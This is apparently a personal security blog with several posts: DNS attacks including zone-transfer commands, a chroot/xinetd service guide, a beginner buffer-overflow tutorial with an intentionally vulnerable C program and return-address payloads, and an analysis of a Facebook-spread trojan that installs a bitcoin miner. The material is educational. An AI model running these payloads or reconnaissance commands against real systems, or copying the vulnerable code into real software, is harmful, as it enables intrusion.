The DNS server is hosted on a number of machines. The administrator can configure the DNS server including the DNS records using either command line interface or a GUI interface provided by the DNS server.

In a Zone File Compromise attack, the attacker attacks the DNS server by gaining direct access to these machines. He/she can be in physical contact with the server or connected through an SSH/RDP connection.

Security measures: Restrict access to the DNS server, both physically and remotely.

Zone Information Leakage/DNS Footprinting

DNS Zone Transfer involves a DNS server passing a copy of part of its database (called a “zone”) to another DNS server. Zone transfer is used when we need to have more than one DNS server answering queries for a particular zone. There is a Master DNS Server and some Slave DNS Servers. A Slave DNS Server asks for zone transfer from the Master DNS Server.

The attacker just pretends to be a Slave DNS Server and asks the Master DNS Server for a copy of the records. These records reveal a lot about the topology of the internal network. Steps for performing Zone Transfer (on a UNIX machine):

  dig NS 'domain' +short

Displays the authoritative name servers for that domain

  dig AXFR 'domain' @'nameserver'

Retrieves all the DNS records from a particular nameserver

Security measures: Restrict zone transfers to particular IP addresses or use any other kind of authentication.

DNS Amplification Attack

This type of attack is used to perform a DoS attack on a victim host using genuine DNS servers. It involves sending DNS packets to a DNS server with the source IP spoofed as the victim’s IP. The DNS server responds with much larger DNS responses, which go to the victim host.

DNS Client Flooding

DNS Client Flooding aims at sending a flood of UDP requests to the DNS server to exhaust its resources. A common technique is to send DNS request packets for an invalid domain. The DNS server spends its resources to look for this domain. After a certain limit, it has no resources to serve legitimate requests.

DNS Cache poisoning

A client queries its configured DNS server for resolving a domain name. This DNS server queries other DNS servers for that domain name and after getting a result, caches it, till the corresponding TTL value. Until this TTL value, client queries for that particular domain name are retrieved from the cache instead of making further queries to other DNS servers for that domain.

This can be abused by an attacker to place false information in the local DNS server’s cache. The attacker needs to reply to the configured DNS server with the malicious address before the genuine reply arrives.
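To make the effect of the TTL concrete, here is a minimal Python sketch of a resolver cache. It is only a toy model, not how any real DNS server is implemented: the `DnsCache` class, the fake clock and the addresses are all assumptions made up for illustration. It shows that whichever answer arrives first is served from the cache until the TTL runs out.

```python
import time


class DnsCache:
    """Toy resolver cache: keeps the first answer for a name until its TTL expires."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock
        self._entries = {}  # name -> (address, expiry time)

    def lookup(self, name):
        """Return the cached address, or None if it is missing or expired."""
        entry = self._entries.get(name)
        if entry is None:
            return None
        address, expires_at = entry
        if self._clock() >= expires_at:
            del self._entries[name]
            return None
        return address

    def store(self, name, address, ttl):
        """Cache an answer unless a still-valid one is already present."""
        if self.lookup(name) is None:
            self._entries[name] = (address, self._clock() + ttl)


now = [0.0]  # fake clock (hypothetical), so the example does not need to sleep
cache = DnsCache(clock=lambda: now[0])

cache.store("example.com", "203.0.113.66", ttl=300)   # forged reply arrives first
cache.store("example.com", "93.184.216.34", ttl=300)  # genuine reply is ignored
poisoned = cache.lookup("example.com")

now[0] = 301.0  # the TTL has passed
expired = cache.lookup("example.com")
```

In this sketch every client asking for `example.com` gets the forged address for the full 300 seconds, which is why winning the race once is enough for the attacker.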

DNS Vulnerabilities in Shared Host Environments

A shared host environment is where one DNS server is shared amongst many users and domains.

Free Services such as cpanel provide such facilities.

Say an attacker using a shared DNS server creates a zone file for the xyz.com domain and adds relevant A and MX records. Now any user whose client has that DNS server configured as primary will, when attempting to go to xyz.com, be directed to the records configured by the attacker, i.e. potentially false information.

DNS Man in the Middle Attacks - DNS Hijacking

An attacker can intercept the name resolution queries sent by the client to a DNS server and send incorrect replies back to the client. This type of attack is very much a race condition, in that the attacker needs to get his/her reply back to the client before the legitimate server does. The client only looks at the first response it gets, and it has no way to tell whether that response came from the attacker or from its DNS server.

Typosquatting

Definition from wikipedia:

Typosquatting, also called URL hijacking, sting site, or fake URL, is a form of cybersquatting, and possibly brandjacking which relies on mistakes such as typographical errors made by Internet users when inputting a website address into a web browser. Should a user accidentally enter an incorrect website address, they may be led to any URL (including an alternative website owned by a cybersquatter).

The attacker registers similar sounding domain names. This threat does not target a particular victim.
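To give a feel for how such look-alike names are derived, here is a small Python sketch that generates a few classes of typos (dropped, doubled and swapped characters). The `typo_variants` helper is hypothetical and far from exhaustive. Real squatters also use neighbouring keys, different TLDs and similar-looking characters.

```python
def typo_variants(domain):
    """Return a sorted list of simple misspellings of the name part of `domain`."""
    name, dot, tld = domain.partition(".")
    variants = set()
    for i in range(len(name)):
        variants.add(name[:i] + name[i + 1:])                # dropped character
        variants.add(name[:i] + name[i] * 2 + name[i + 1:])  # doubled character
        if i + 1 < len(name):
            # two neighbouring characters typed in the wrong order
            variants.add(name[:i] + name[i + 1] + name[i] + name[i + 2:])
    variants.discard(name)  # swapping identical letters gives the original name
    variants.discard("")
    return sorted(v + dot + tld for v in variants)


candidates = typo_variants("google.com")
```

A domain owner could run something like this over their own name to see which misspellings are worth registering defensively.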

DNSSEC (Domain Name System Security Extensions)

Around 1994, the IETF started a discussion to make DNS secure by adding a set of extensions to it. These extensions, labeled as Domain Name System Security Extensions (DNSSEC), were formally published in 2005. Unfortunately, even after around 10 years, DNSSEC is still not widely adopted even though it is backward compatible, mostly because network operators prefer stability over added complexity.

Backward compatibility was enforced by using the RR (Resource Record) construct of the DNS that was purposely designed to be extensible. A new set of RRs was defined that holds the security information. While designing DNSSEC, performance issues were kept in mind.

In all, DNSSEC provides authentication and integrity to the DNS. This helps in preventing many attacks. Cache poisoning and client flooding attacks are prevented with the addition of source authentication. Even the Zone File Compromise attack is mitigated. Note however that DNSSEC does not provide any security against information leakage.

Note: I recently did a talk about DNS Security in my college. Slides can be found here.

Edit: Lately there has been work on minimizing information leakage. This is a good resource. Thanks to captnemo for pointing this out.

Combining chroot and xinetd

2015-05-04T00:00:00+00:00

Introduction

In this post we will talk about running network applications securely. A simple program (one that takes I/O from the console) can be run as a secure service using a combination of xinetd and chroot. I used this technique while developing challenges for Backdoor. The ECHO challenge is a good example.

Key points:

The program running in the background takes I/O directly from the console.
xinetd handles all the network related requests.
The program is run in a jail directory using chroot with restricted access to directory structure.

I will give a simple walkthrough but first I expect the reader to be familiar with the following:

xinetd

This is what wikipedia says:

  xinetd listens for incoming requests over a network and launches the appropriate service for that request. Requests are made using port numbers as identifiers and xinetd usually launches another daemon to handle the request.

Instead of starting each server individually, xinetd is the only daemon process to be started. It listens for each and every service listed in its configuration and starts the appropriate service whenever a new request comes up.

chroot

Again from wikipedia:

  A chroot on Unix operating systems is an operation that changes the apparent root directory for the current running process and its children. A program that is run in such a modified environment cannot name (and therefore normally not access) files outside the designated directory tree. The modified environment is called a "chroot jail".

Setting up a chroot jail is easy though time consuming.

Walkthrough - reader

We’ll write a simple service that takes the name of a file as input and prints the first 1024 bytes of the file.

1. Write source program for the service

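  #include <stdio.h>
  #include <unistd.h>
  #include <fcntl.h>
  #include <errno.h>

  int main(void)
  { char file_name[50];
    char buf[1025];   /* 1024 bytes of data plus a terminating '\0' */
    ssize_t n;
    int fd;
    
    printf("Enter filename:\n");
    fflush(stdout);
    /* Limit the input to 49 characters so file_name cannot overflow */
    if(scanf("%49s", file_name)!=1)
      return -1;
    
    fd = open(file_name, O_RDONLY);
    if(fd==-1)
    { printf("Error: %d\n", errno);
      return -1;
    }
    /* Read at most 1024 bytes, leaving room for the terminator */
    n = read(fd, buf, sizeof(buf)-1);
    if(n<0)
    { printf("Error: %d\n", errno);
      close(fd);
      return -1;
    }
    buf[n] = '\0';

    printf("%s\n", buf);
    close(fd);
    return 0;
  }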

Download it here

2. Creating a chroot jail

First of all let’s compile our code and generate the binary.

gcc reader.c -o reader

As it will be jailed, we need to import all the libraries that our binary reader will require. For finding all the required libraries we will use ldd.

  $ ldd reader
  linux-vdso.so.1 =>  (0x00007ffc79702000)
  libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f4b13787000)
  /lib64/ld-linux-x86-64.so.2 (0x00007f4b13b76000)

This is a sample output on my machine and it may vary for yours. So basically I copy the two libraries (libc.so.6 and ld-linux-x86-64.so.2) maintaining the same directory structure relative to my program. My directory structure now looks like this:

  ./
  |-- lib/
  |   |-- x86_64-linux-gnu/
  |       |-- libc.so.6
  |-- lib64/
  |   |-- ld-linux-x86-64.so.2
  |-- reader.c
  |-- reader
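Copying the libraries by hand gets tedious for larger binaries. As a rough sketch, the step can be scripted in Python by parsing the text printed by ldd and copying every absolute path into the jail while keeping its directory structure. Both helper names below are hypothetical, and the parser only assumes the output format shown in the sample above.

```python
import os
import shutil


def library_paths(ldd_output):
    """Extract absolute library paths from the text printed by `ldd`."""
    paths = []
    for line in ldd_output.splitlines():
        fields = line.split()
        if "=>" in fields:
            # "libc.so.6 => /lib/.../libc.so.6 (0x...)": path follows the arrow
            idx = fields.index("=>") + 1
            candidate = fields[idx] if idx < len(fields) else ""
        elif fields:
            # "/lib64/ld-linux-x86-64.so.2 (0x...)": path is the first field
            candidate = fields[0]
        else:
            continue
        if candidate.startswith("/"):  # skips linux-vdso, which has no file
            paths.append(candidate)
    return paths


def copy_into_jail(paths, jail_dir):
    """Copy each library to the same relative location inside jail_dir."""
    for path in paths:
        target = os.path.join(jail_dir, path.lstrip("/"))
        os.makedirs(os.path.dirname(target), exist_ok=True)
        shutil.copy2(path, target)  # follows symlinks and copies the real file
```

With the sample output above, `library_paths` returns the paths of libc.so.6 and ld-linux-x86-64.so.2 and leaves out linux-vdso.so.1, which is provided by the kernel and has no file on disk.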

To test that you have successfully created a jail, try this (chroot needs root privileges):

chroot . ./reader

You won’t be able to view any file outside the reader’s directory. If you can then you did something wrong!

3. Adding a configuration file in xinetd for reader

First of all make sure that /etc/xinetd.conf contains the following line:

includedir /etc/xinetd.d

After that create a new configuration file /etc/xinetd.d/reader

  service reader
  {
    type    = UNLISTED
    protocol  = tcp
    socket_type = stream
    port    = 8001
    wait    = no

    server    = /usr/sbin/chroot
    server_args = /home/vampire/reader/ ./reader
    
    user    = root
  }

You can download the file here.

Explanation:

type = UNLISTED: Standard services are listed in /etc/services. Our service is not standard, so we also need to specify the protocol and port.
protocol = tcp: We shall use the TCP protocol.
socket_type = stream: We will use a connection-oriented socket.
port = 8001: The port number our service will listen on.
wait = no: Our service is multithreaded in xinetd’s terms: xinetd keeps listening and starts a new instance of the server for each connection, so more than one client can be connected at a time.
server = /usr/sbin/chroot: This is the chroot binary on my machine. You can find yours by executing which chroot.
server_args = /home/vampire/reader/ ./reader: These are the parameters passed to the chroot command.
user = root: Only root can run chroot.

For complete list see the man page.

4. Restart the xinetd daemon

The xinetd daemon can be restarted using the following command:

/etc/init.d/xinetd restart

xinetd logs to /var/log/syslog by default.

Hurray! We have successfully run our service securely. To test it run the following command:

nc localhost 8001

Change the IP/port accordingly. You should be able to run the program correctly. Also try giving different file path names. You won’t be able to access any file other than those in /home/vampire/reader/. Also remember to flush the output buffer in your program so that the text is displayed instantly.

Comments are welcome. If you know of a better way to do this, feel free to tell me!

Buffer Overflow Exploit

2015-04-03T00:00:00+00:00

Introduction

I am interested in exploiting binary files. The first time I came across the buffer overflow exploit, I couldn’t actually implement it. Many of the existing sources on the web were outdated (they worked with earlier versions of gcc, linux, etc.). It took me quite a while to actually run a vulnerable program on my machine and exploit it.

I decided to write a simple tutorial for beginners or people who have just entered the field of binary exploits.

What will this tutorial cover?

This tutorial will be very basic. We will simply overflow a buffer on the stack and overwrite the return address of the function. This will be used to call some other function. You can also use the same technique to point the return address to some custom code that you have written, thereby executing anything you want (perhaps I will write another blog post regarding shellcode injection).

Any prerequisites?

I assume people to have basic-intermediate knowledge of C.
They should be a little familiar with gcc and the linux command line.
Basic x86 assembly language.

Machine Requirements:

This tutorial is specifically written to work on the latest distros of linux. It might work on older versions. The same goes for gcc. We are going to create a 32 bit binary, so it will work on both 32 and 64 bit systems.

Sample vulnerable program:

#include <stdio.h>

void secretFunction()
{
    printf("Congratulations!\n");
    printf("You have entered in the secret function!\n");
}

void echo()
{
    char buffer[20];

    printf("Enter some text:\n");
    scanf("%s", buffer);
    printf("You entered: %s\n", buffer);    
}

int main()
{
    echo();

    return 0;
}

Now this program looks quite safe to the usual programmer. But in fact we can call secretFunction by just modifying the input. There are better ways to do this if the binary is local. We can use gdb to modify the %eip. But in case the binary is running as a service on some other machine, we can make it call other functions or even custom code by just modifying the input.

Memory Layout of a C program

Let’s start by examining the memory layout of a C program, especially the stack, its contents and how it works during function calls and returns. We will also go into the machine registers esp, ebp, etc.

Divisions of memory for a running process

Source: http://i.stack.imgur.com/1Yz9K.gif

Command line arguments and environment variables: The arguments passed to a program before running and the environment variables are stored in this section.
Stack: This is the place where all the function parameters, return addresses and the local variables of the function are stored. It’s a LIFO structure. It grows downward in memory (from higher address space to lower address space) as new function calls are made. We will examine the stack in more detail later.
Heap: All the dynamically allocated memory resides here. Whenever we use malloc to get memory dynamically, it is allocated from the heap. The heap grows upwards in memory (from lower to higher memory addresses) as more and more memory is required.
Uninitialized data (BSS Segment): All the uninitialized data is stored here. This consists of all global and static variables which are not initialized by the programmer. The kernel initializes them to arithmetic 0 by default.
Initialized data (Data Segment): All the initialized data is stored here. This consists of all global and static variables which are initialized by the programmer.
Text: This is the section where the executable code is stored. The loader loads instructions from here and executes them. It is often read only.

Some common registers:

%eip: The Instruction pointer register. It stores the address of the next instruction to be executed. After every instruction execution its value is incremented depending upon the size of the instruction.
%esp: The Stack pointer register. It stores the address of the top of the stack. This is the address of the last element on the stack. The stack grows downward in memory (from higher address values to lower address values). So %esp points to the value on the stack at the lowest memory address.
%ebp: The Base pointer register. The %ebp register is usually set to %esp at the start of the function. This is done to keep track of function parameters and local variables. Local variables are accessed by subtracting offsets from %ebp and function parameters are accessed by adding offsets to it, as you shall see in the next section.

Memory management during function calls

Consider the following piece of code:

void func(int a, int b)
{
    int c;
    int d;
    // some code
}
int main()
{
    func(1, 2);
    // next instruction
    return 0;
}

Assume our %eip is pointing to the func call in main. The following steps would be taken:

A function call is found, so push the parameters on the stack from right to left (in reverse order). So 2 will be pushed first and then 1.
We need to know where to return after func is completed, so push the address of the next instruction on the stack.
Find the address of func and set %eip to that value. The control has been transferred to func().
As we are in a new function we need to update %ebp. Before updating we save it on the stack so that we can return later back to main. So %ebp is pushed on the stack.
Set %ebp to be equal to %esp. %ebp now points to current stack pointer.
Push local variables onto the stack/reserve space for them on the stack. %esp will be changed in this step.
After func gets over we need to reset the previous stack frame. So set %esp back to %ebp. Then pop the earlier %ebp from stack, store it back in %ebp. So the base pointer register points back to where it pointed in main.
Pop the return address from stack and set %eip to it. The control flow comes back to main, just after the func function call.

This is how the stack would look while in func.
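As a rough text rendering of that layout, the pushes described above can be simulated in a few lines of Python. This is only a sketch of the steps listed in this post: the `call_func_frame` helper, the starting %esp, the return address and the saved %ebp value are all made-up numbers for illustration.

```python
def call_func_frame(args, return_address, saved_ebp, n_locals, esp):
    """Simulate the pushes of a 32-bit x86 call; return (stack, ebp, esp)."""
    stack = {}  # address -> description of the 4-byte slot stored there

    def push(value):
        nonlocal esp
        esp -= 4              # the stack grows towards lower addresses
        stack[esp] = value

    for arg in reversed(args):    # parameters are pushed right to left
        push(f"arg {arg}")
    push(f"return address {return_address:#x}")
    push(f"saved ebp {saved_ebp:#x}")
    ebp = esp                     # %ebp is set equal to %esp
    for i in range(n_locals):     # space for the local variables
        push(f"local #{i}")
    return stack, ebp, esp


# func(1, 2) with two locals (c and d); all addresses are hypothetical
stack, ebp, esp = call_func_frame([1, 2], 0x08048400, 0xFFFFD018, 2,
                                  esp=0xFFFFD000)
for address in sorted(stack, reverse=True):
    print(f"{address:#x}  ebp{address - ebp:+d}  {stack[address]}")
```

The printed offsets show the pattern the exploit relies on: parameters sit at positive offsets from %ebp, the return address at %ebp+4, and local variables at negative offsets.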

Buffer overflow vulnerability

Buffer overflow is a vulnerability in low-level C and C++ code. An attacker can cause the program to crash, corrupt data, steal some private information or run his/her own code.

It basically means accessing a buffer outside of its allotted memory space. This happens quite frequently in the case of arrays. As variables are stored together in the stack/heap/etc., accessing an out-of-bounds index can read or write the bytes of some other variable. Normally the program would crash, but we can skillfully make some vulnerable code perform any of the above mentioned attacks. Here we shall modify the return address and make the program jump to the address we supply.

Here is the link to the above mentioned code. Let’s compile it.

For 32 bit systems

gcc vuln.c -o vuln -fno-stack-protector

For 64 bit systems

gcc vuln.c -o vuln -fno-stack-protector -m32

-fno-stack-protector disables the stack protection. Smashing the stack is now allowed. -m32 makes sure that the compiled binary is 32 bit. You may need to install some additional libraries to compile 32 bit binaries on 64 bit machines. You can download the binary generated on my machine here.

You can now run it using ./vuln.

Enter some text:
HackIt!
You entered: HackIt!

Let’s begin to exploit the binary. First of all we would like to see the disassembly of the binary. For that we’ll use objdump

objdump -d vuln

Running this we would get the entire disassembly. Let’s focus on the parts that we are interested in. (Note however that your output may vary.)

Inferences:

The address of secretFunction is 0804849d in hex.
```
 0804849d <secretFunction>:
```
38 in hex or 56 in decimal bytes are reserved for the local variables of echo function.
```
 80484c0:    83 ec 38    sub         $0x38,%esp
```
The address of buffer starts 1c in hex or 28 in decimal bytes before %ebp. This means that 28 bytes are reserved for buffer even though we asked for 20 bytes.
```
 80484cf:    8d 45 e4    lea         -0x1c(%ebp),%eax
```

Designing payload:

We now know that 28 bytes are reserved for buffer and that it sits right below the saved %ebp (the base pointer of the main function). Hence the next 4 bytes store that %ebp and the 4 bytes after that store the return address (the address that %eip is going to jump to after the function completes). Now it is pretty obvious what our payload should look like. The first 28+4=32 bytes can be any random characters and the next 4 bytes will be the address of secretFunction.

Note: Registers are 4 bytes or 32 bits as the binary is compiled for a 32 bit system.

The address of secretFunction is 0804849d in hex. Now depending on whether our machine is little-endian or big-endian we need to decide the proper format of the address to be put. For a little-endian machine (x86 is little-endian) we need to put the bytes in reverse order, i.e. 9d 84 04 08. The following scripts generate such payloads on the terminal. Use whichever language you prefer:

ruby -e 'print "a"*32 + "\x9d\x84\x04\x08"'

python -c 'print "a"*32 + "\x9d\x84\x04\x08"'

perl -e 'print "a"x32 . "\x9d\x84\x04\x08"'

php -r 'echo str_repeat("a",32) . "\x9d\x84\x04\x08";'

Note: we write \x9d because the \x prefix tells the interpreter that 9d is a byte value given in hex.
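The python one-liner above uses Python 2 syntax. As a hedged sketch for Python 3, the same payload can be built from the numbers found in the disassembly, letting struct.pack take care of the little-endian byte order. The constant and function names are my own, and the address is the one from my objdump output, so yours will probably differ.

```python
import struct

BUFFER_OFFSET_FROM_EBP = 0x1C   # from: lea -0x1c(%ebp),%eax
SAVED_EBP_SIZE = 4              # saved base pointer on a 32 bit binary
SECRET_FUNCTION = 0x0804849D    # address of secretFunction in my binary


def build_payload():
    """Return the padding followed by the little-endian target address."""
    padding = b"a" * (BUFFER_OFFSET_FROM_EBP + SAVED_EBP_SIZE)
    # "<I" means little-endian unsigned 32-bit integer
    return padding + struct.pack("<I", SECRET_FUNCTION)


def write_payload(stream):
    """Write the raw bytes to a binary stream such as sys.stdout.buffer."""
    stream.write(build_payload())
```

In Python 3 the bytes have to go through a binary stream, because printing a str would re-encode \x9d as two UTF-8 bytes. A one-line equivalent on the terminal would be python3 -c 'import sys; sys.stdout.buffer.write(b"a"*32 + b"\x9d\x84\x04\x08")'.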

You can pipe this payload directly into the vuln binary.

ruby -e 'print "a"*32 + "\x9d\x84\x04\x08"' | ./vuln

python -c 'print "a"*32 + "\x9d\x84\x04\x08"' | ./vuln

perl -e 'print "a"x32 . "\x9d\x84\x04\x08"' | ./vuln

php -r 'echo str_repeat("a",32) . "\x9d\x84\x04\x08";' | ./vuln

This is the output that I get:

Enter some text:
You entered: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<rubbish 3 bytes>
Congratulations!
You have entered in the secret function!
Illegal instruction (core dumped)

Cool! We were able to overflow the buffer and modify the return address. secretFunction got called. But this did foul up the stack: secretFunction was entered without a proper call, so there was no valid return address for it to return to, and the program crashed afterwards.

Which C functions are vulnerable to Buffer Overflow Exploit?

gets
scanf
sprintf
strcpy

Whenever you are using buffers, be careful about their maximum length. Handle them appropriately.

What next?

While managing BackdoorCTF I devised a simple challenge based on this vulnerability. Here. See if you can solve it!

Facebook spam spreads Trojan

2014-06-12T00:00:00+00:00

Introduction

Somewhere back in May, I started getting messages such as this on facebook:

I had around 300 friends then and got almost 8-9 such messages. The interesting thing was that those people were completely unrelated. As far as I knew, some of them didn’t even know each other. Suspecting some trick, I decided to analyze the file.

Analysis

Handling the zip file

I downloaded the zip file and verified its type using the linux file command. After unzipping the file I found a jar file inside it. Just for reference, a jar file is a java archive file which can be run by simply double clicking it. It plays the same role as an exe file produced from C/C++. Another important point to note is that a jar file is in fact a zip file (only the extension has been changed). So the next step was to extract the jar file. Doing that produced a single class file along with the usual META-INF directory.

vampire@linux:~/Documents/analysis$ file Form_0320.ZIP
Form_0320.ZIP: Zip archive data, at least v2.0 to extract
vampire@linux:~/Documents/analysis$ unzip Form_0320.ZIP
Archive:  Form_0320.ZIP
  inflating: Form_0320.jar
vampire@linux:~/Documents/analysis$ file Form_0320.jar
Form_0320.jar: Zip archive data, at least v2.0 to extract
vampire@linux:~/Documents/analysis$ unzip Form_0320.jar
Archive:  Form_0320.jar
   creating: META-INF/
  inflating: META-INF/MANIFEST.MF
  inflating: CNQNYPYFEBMJTHYPMGR.class
vampire@linux:~/Documents/analysis$ ls
Form_0320.jar  Form_0320.ZIP  CNQNYPYFEBMJTHYPMGR.class  META-INF

Note: I am analysing Form_0320.ZIP.

Decompiling and analysing the java class file

Next I decompiled the class file using the jad tool.

vampire@linux:~/Documents/analysis$ jad CNQNYPYFEBMJTHYPMGR.class 
Parsing CNQNYPYFEBMJTHYPMGR.class...The class file version is 51.0 (only 45.3, 46.0 and 47.0 are supported)
  Generating CNQNYPYFEBMJTHYPMGR.jad

It created CNQNYPYFEBMJTHYPMGR.jad which contains the source code for the java program. The resulting code was heavily obfuscated. All Strings were stored as int arrays of ascii codes. The arrays were dynamically converted to String within the code. I present here an easy to understand version of the code.
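The string hiding trick itself is easy to undo. A minimal Python sketch of the idea follows. It is not the decompiled code, and the array below is a made-up example rather than one taken from the class file.

```python
def decode(codes):
    """Turn a list of ASCII codes back into the string it hides."""
    return "".join(chr(code) for code in codes)


# Hypothetical example of how a string could be stored in the class file
hidden = [114, 101, 103, 115, 118, 114, 51, 50]
revealed = decode(hidden)  # "regsvr32"
```

Running a helper like this over every int array in the decompiled source is enough to make the URLs, paths and commands readable again.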

Instead of going through the code line by line I will explain the whole code at once. The program tries to download a certain file from a dropbox link. The same file has multiple links so that if one fails the others might work. If it gets a successful HTTP response code it downloads the file to C:\temp\NWQGHJ.MXZ. The program then registers it with windows using the regsvr32 command running in silent mode (/s). So I downloaded the file (d.dat) manually from the dropbox link and ran the file command on it.

vampire@linux:~/Documents/analysis$ file d.dat
d.dat: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

This shows that the file is a Windows DLL file.

Analysing the DLL file

I tried a few approaches at first which seemed to lead nowhere, including strings and objdump. Later I renamed it to d.dll (to make sure my antivirus on windows finds it) and switched over to windows. Here’s a snapshot of what my antivirus found:

Hence it somehow connects the dll with the windows process explorer.exe. This process is the one used to browse the files in a computer. Next I used strings command and stored the result in a file.

vampire@linux:~/Documents/analysis$ strings d.dat > file

Then I opened the file in a text editor and searched for .exe. This resulted in two matches:

minerd.exe
explorer.exe
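The same search can be done without a text editor. Below is a small Python sketch that mimics the basic behaviour of strings (runs of at least four printable ASCII characters) and then filters for .exe. The helper name and the sample bytes are assumptions for illustration, and the real strings tool has more options than this.

```python
import re


def printable_strings(data, min_length=4):
    """Yield runs of printable ASCII bytes, similar in spirit to `strings`."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_length)
    for match in pattern.finditer(data):
        yield match.group().decode("ascii")


# Made-up bytes standing in for the contents of d.dat
sample = b"\x00\x01minerd.exe\x00\xff\x10ab\x00explorer.exe\x00"
executables = [s for s in printable_strings(sample) if ".exe" in s]
```

For the real file, `sample` would be replaced by the bytes read with open("d.dat", "rb").read().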

Seems to be getting somewhere. Browsing through the 59252 lines I found the following two snippets:

explorer -o stratum+tcp://%s:%d -O %s:%s -t %d -R 1
explorer -o stratum+tcp://%s:%d -O %s:%s -t %d -R 1
explorer -o stratum+tcp://%s:%d -O %s:%s -t 1 -R 1
explorer -o stratum+tcp://%s:%d -O %s:%s -t %d -R 1
explorer -o stratum+tcp://%s:%d -O %s:%s -t 1 -R 1
explorer -o stratum+tcp://%s:%d -O %s:%s -t %d -R 1  

and this one:

Usage: minerd [OPTIONS]
Options:
  -a, --algo=ALGO       specify the algorithm to use
                          scrypt    scrypt(1024, 1, 1) (default)
                          sha256d   SHA-256d
  -o, --url=URL         URL of mining server (default: http://127.0.0.1:9332/)
  -O, --userpass=U:P    username:password pair for mining server
  -u, --user=USERNAME   username for mining server
  -p, --pass=PASSWORD   password for mining server
      --cert=FILE       certificate for mining server using SSL
  -x, --proxy=[PROTOCOL://]HOST[:PORT]  connect through a proxy
  -t, --threads=N       number of miner threads (default: number of processors)
  -r, --retries=N       number of times to retry if a network call fails
                          (default: retry indefinitely)
  -R, --retry-pause=N   time to pause between retries, in seconds (default: 30)
  -T, --timeout=N       network timeout, in seconds (default: 270)
  -s, --scantime=N      upper bound on time spent scanning current work when
                          long polling is unavailable, in seconds (default: 5)
      --no-longpoll     disable X-Long-Polling support
      --no-stratum      disable X-Stratum support
  -q, --quiet           disable per-thread hashmeter output
  -D, --debug           enable debug output
  -P, --protocol-dump   verbose dump of protocol-level activities
      --benchmark       run in offline benchmark mode
  -c, --config=FILE     load a JSON-format configuration file
  -V, --version         display version information and exit
  -h, --help            display this help text and exit

I searched about minerd.exe on the internet and found out this:

minerd.exe is a part of multi-threaded CPU miner for Bitcoin crypto-currency system. Very often this application causes CPU usage to go to 90% or even more. Needles to say it’s not essential for Windows and may cause problems. If you knowingly installed this Bitcoin miner on your computer then there’s nothing to worry about. Even if you antivirus says it’s a trojan horse it’s probably a false positive. However, cyber crooks and fraudsters are using this software to earn some extra money as well by monetizing botnets. They drop the main mining modules on infected computers and start mining. They usually set low mining speed, so that the minerd.exe process only uses unused CPU cycles.

So basically this file uses the CPU to mine for bitcoins. It is a core part of the bitcoin virus. But it doesn’t stop here. The file further sends the same message to other people on facebook. In case they open it, the same thing happens again. In this way a botnet (a collection of programs communicating over a network with other similar programs to perform tasks) is set up by the attacker to mine bitcoins!

Summary

In short this trojan does the following things:

The victim receives a message on facebook. The message contains a zip file and a text message (lol) so that the victim is eager to open it.
Inside the zip file is a jar file which the user opens again without suspecting anything.
The jar file downloads a dll file from a dropbox link to the local hard disk and registers it to windows.
This file then sends the same message to all the friends of the victim on facebook and simultaneously starts mining for bitcoins.
Within a short span of time a botnet of victims is set up.

Preventive Measures

Never open a file you are not sure about.
Confirm with your friend whether he/she actually sent it (preferably using a different communication channel).
Always have an updated antivirus program running on your windows machine.

Shifting to Ubuntu

2014-05-23T00:00:00+00:00

Initial days…

I had started coding on Windows. I began to get familiar with the graphical interfaces of NetBeans, Visual Studio, Eclipse etc. As I got to know more about programming and developing I began to hear about a certain thing called ‘linux’. This word kept popping up in many answers on stackoverflow and other resources that I used to depend upon. At first the name gave me the image of a computer with a pitch black screen with just plain text appearing on it. I then came to know about the power of the linux terminal. As I already had a little experience with batch scripting in the Windows command prompt, I began to realize the usefulness of such an operating system. But due to my busy schedule I couldn’t delve further into this topic at that time.

A few years later one of my friends told me that she had installed Ubuntu on her desktop PC. I knew it was one of the Linux distributions. Then she started comparing it with Windows. This increased my interest in Ubuntu and I began to think of switching to it from Windows. I also heard from some other resource that the graphical interface of Ubuntu is sufficient for people to start working on it without any prior experience. This made up my mind and I finally installed Ubuntu alongside Windows.

Switching over…

During the initial days I used the graphical interface of Ubuntu for my work. Side by side, using various references, I got to know more and more about the terminal. Although it took me around a full week to download all the software required for various programming languages and to get it working right, I learned a lot about Ubuntu. From then on I used to code in Ubuntu while doing other work in Windows. Within a few weeks I had started using the terminal extensively. I had stopped using IDEs and used the text editor ‘gedit’ and the terminal instead for compiling and running programs. Within another few months I stopped using Windows entirely except for a few programs for which I couldn’t find replacements in Ubuntu.

Some features of Linux over Windows:

Customizability: The customizability of Linux is virtually limitless. If you don’t like something you simply change it.
Stability: Linux operating systems are much more stable than Windows. You could leave a Linux desktop on for several months without any performance degradation. In case you leave Windows on for even a few days it starts crashing.
Performance: Resource management of Linux is pretty good. It knows how to allocate proper memory and utilize the processor more efficiently than Windows.
Developing: If you are a developer then no doubt you SHOULD use linux. There are a whole bunch of tools that you would be missing out on in Windows. Apart from that, developing any application is much easier in Linux than in Windows. I’d like to give you an instance of it. When I had started learning PHP in my Windows days, I had a lot of trouble setting up a PHP server on my pc. I was so fed up that I completely removed it. In fact I used to host my PHP pages on a free PHP hosting website. Imagine the time it took me to make any change. I first made changes in my files locally, then used ftp to transfer them to the server (which was running apache on linux). When I had to use PHP on Ubuntu, on the other hand, it hardly took me 3-5 minutes to get LAMP (Linux-Apache-MySQL-PHP) installed. All I had to do to view my changes was to press the refresh button!
Price: Linux is completely free!
Terminal: The linux terminal is far more powerful than the Windows command prompt. I could do tons of things using extremely short commands.

Present situation…

Currently I do practically all my work using the terminal. Whenever I open my laptop my first keys are Ctrl-Alt-t, which opens the terminal, and my last keys are sudo shutdown -h now, which shuts down the laptop. I’ve started loving it. Now I even download files, download videos from youtube, send mails and use facebook (yeah even this!) using the terminal. It has made things much easier and more systematic. Imagine liking and commenting on 100+ posts on your birthday and compare it with just a few commands at the terminal doing the same thing. It saves a lot of time. Apart from that I use ‘Sublime Text 2’ for writing code, ‘vim’ when I need to change a few lines and the ‘chromium web browser’ for browsing the web.